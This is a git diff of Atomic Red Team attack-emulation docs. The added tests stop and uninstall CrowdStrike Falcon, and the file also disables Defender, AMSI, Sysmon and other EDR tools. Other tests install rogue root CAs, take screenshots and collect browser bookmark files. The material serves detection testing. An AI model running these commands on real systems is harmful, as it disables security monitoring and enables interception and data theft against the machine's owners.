PowerShell](#atomic-test-14---tamper-with-windows-defender-atp-powershell) +- [Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14---amsi-bypass---remove-amsi-provider-reg-key) -- [Atomic Test #15 - Tamper with Windows Defender Command Prompt](#atomic-test-15---tamper-with-windows-defender-command-prompt) +- [Atomic Test #15 - Disable Arbitrary Security Windows Service](#atomic-test-15---disable-arbitrary-security-windows-service) -- [Atomic Test #16 - Tamper with Windows Defender Registry](#atomic-test-16---tamper-with-windows-defender-registry) +- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell) -- [Atomic Test #17 - Disable Microft Office Security Features](#atomic-test-17---disable-microft-office-security-features) +- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt) -- [Atomic Test #18 - Remove Windows Defender Definition Files](#atomic-test-18---remove-windows-defender-definition-files) +- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry) -- [Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-19---stop-and-remove-arbitrary-security-windows-service) +- [Atomic Test #19 - Disable Microft Office Security Features](#atomic-test-19---disable-microft-office-security-features) + +- [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files) + +- [Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-21---stop-and-remove-arbitrary-security-windows-service) + +- [Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-22---uninstall-crowdstrike-falcon-on-windows)
@@ -164,7 +170,37 @@ setenforce 0

-## Atomic Test #5 - Disable Carbon Black Response +## Atomic Test #5 - Stop Crowdstrike Falcon on Linux +Stop and disable Crowdstrike Falcon on Linux + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sudo systemctl stop falcon-sensor.service +sudo systemctl disable falcon-sensor.service +``` + +#### Cleanup Commands: +```sh +sudo systemctl enable falcon-sensor.service +sudo systemctl start falcon-sensor.service +``` + + + + + +
+
+ +## Atomic Test #6 - Disable Carbon Black Response Disables Carbon Black Response **Supported Platforms:** macOS @@ -188,7 +224,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist

-## Atomic Test #6 - Disable LittleSnitch +## Atomic Test #7 - Disable LittleSnitch Disables LittleSnitch **Supported Platforms:** macOS @@ -212,7 +248,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

-## Atomic Test #7 - Disable OpenDNS Umbrella +## Atomic Test #8 - Disable OpenDNS Umbrella Disables OpenDNS Umbrella **Supported Platforms:** macOS @@ -236,7 +272,38 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig

-## Atomic Test #8 - Unload Sysmon Filter Driver +## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS +Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist| +| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sudo launchctl unload #{falcond_plist} +sudo launchctl unload #{userdaemon_plist} +``` + + + + + + +
+
+ +## Atomic Test #10 - Unload Sysmon Filter Driver Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded". @@ -307,7 +374,7 @@ sysmon -accepteula -i

-## Atomic Test #9 - Disable Windows IIS HTTP Logging +## Atomic Test #11 - Disable Windows IIS HTTP Logging Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. @@ -341,7 +408,7 @@ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:htt

-## Atomic Test #10 - Uninstall Sysmon +## Atomic Test #12 - Uninstall Sysmon Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows @@ -399,7 +466,7 @@ cmd /c sysmon -i -accepteula

-## Atomic Test #11 - AMSI Bypass - AMSI InitFailed +## Atomic Test #13 - AMSI Bypass - AMSI InitFailed Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. @@ -430,7 +497,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

-## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key +## Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone. @@ -460,7 +527,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4

-## Atomic Test #13 - Disable Arbitrary Security Windows Service +## Atomic Test #15 - Disable Arbitrary Security Windows Service With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService" @@ -497,7 +564,7 @@ net.exe start #{service_name} >nul 2>&1

-## Atomic Test #14 - Tamper with Windows Defender ATP PowerShell +## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. @@ -532,7 +599,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 0

-## Atomic Test #15 - Tamper with Windows Defender Command Prompt +## Atomic Test #17 - Tamper with Windows Defender Command Prompt Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed. @@ -565,7 +632,7 @@ sc config WinDefend start=enabled >nul 2>&1

-## Atomic Test #16 - Tamper with Windows Defender Registry +## Atomic Test #18 - Tamper with Windows Defender Registry Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. @@ -594,7 +661,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa

-## Atomic Test #17 - Disable Microft Office Security Features +## Atomic Test #19 - Disable Microft Office Security Features Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. @@ -633,7 +700,7 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected

-## Atomic Test #18 - Remove Windows Defender Definition Files +## Atomic Test #20 - Remove Windows Defender Definition Files Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. @@ -661,7 +728,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-

-## Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service +## Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database. **Supported Platforms:** Windows @@ -688,4 +755,33 @@ Remove-Service -Name #{service_name} +
+
+ +## Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows +Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} +``` + + + + + +
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 0a882b64..19e131eb 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -34,7 +34,7 @@ Use screencapture command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -44,6 +44,10 @@ Use screencapture command to collect a full desktop screenshot screencapture #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` @@ -63,7 +67,7 @@ Use screencapture command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -73,6 +77,10 @@ Use screencapture command to collect a full desktop screenshot screencapture -x #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` @@ -92,7 +100,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.xwd| +| output_file | Output file path | Path | /tmp/T1113_desktop.xwd| #### Attack Commands: Run with `bash`! @@ -103,6 +111,10 @@ xwd -root -out #{output_file} xwud -in #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` 
@@ -122,7 +134,7 @@ Use import command to collect a full desktop screenshot #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| output_file | Output file path | Path | desktop.png| +| output_file | Output file path | Path | /tmp/T1113_desktop.png| #### Attack Commands: Run with `bash`! @@ -132,6 +144,10 @@ Use import command to collect a full desktop screenshot import -window root #{output_file} ``` +#### Cleanup Commands: +```bash +rm #{output_file} +``` diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md index a25bb9f4..c64d7f84 100644 --- a/atomics/T1130/T1130.md +++ b/atomics/T1130/T1130.md @@ -14,6 +14,12 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d - - [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel) +- [Atomic Test #2 - Install root CA on Debian/Ubuntu](#atomic-test-2---install-root-ca-on-debianubuntu) + +- [Atomic Test #3 - Install root CA on macOS](#atomic-test-3---install-root-ca-on-macos) + +- [Atomic Test #4 - Install root CA on Windows](#atomic-test-4---install-root-ca-on-windows) +
@@ -37,7 +43,7 @@ Creates a root CA with openssl ```sh openssl genrsa -out #{key_filename} 4096 -openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; then @@ -53,4 +59,141 @@ fi +
+
+ +## Atomic Test #2 - Install root CA on Debian/Ubuntu +Creates a root CA with openssl + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | CA file name | Path | rootCA.crt| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +mv #{cert_filename} /usr/local/share/ca-certificates +echo sudo update-ca-certificates +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```cmd +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```cmd +if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} +``` + + + + +
+
+ +## Atomic Test #3 - Install root CA on macOS +Creates a root CA with openssl + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| +| cert_filename | CA file name | Path | rootCA.crt| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```cmd +if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```cmd +if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; +openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} +``` + + + + +
+
+ +## Atomic Test #4 - Install root CA on Windows +Creates a root CA with Powershell + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| pfx_path | Path of the certificate | Path | rootCA.cer| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My +Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root" +``` + +#### Cleanup Commands: +```cmd +$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My +Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item +Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Verify the certificate exists. It generates if not on disk. +##### Check Prereq Commands: +```powershell +if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My +Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path} +Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item +``` + + + +
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index 03244ea9..ae9f9e23 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -29,14 +29,24 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; +find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` @@ -53,14 +63,24 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \; +find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +``` 
@@ -77,14 +97,24 @@ Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt| + #### Attack Commands: Run with `sh`! ```sh -find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt \; +find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \; +cat #{output_file} 2>/dev/null ``` +#### Cleanup Commands: +```sh +rm -f #{output_file} 2>/dev/null +```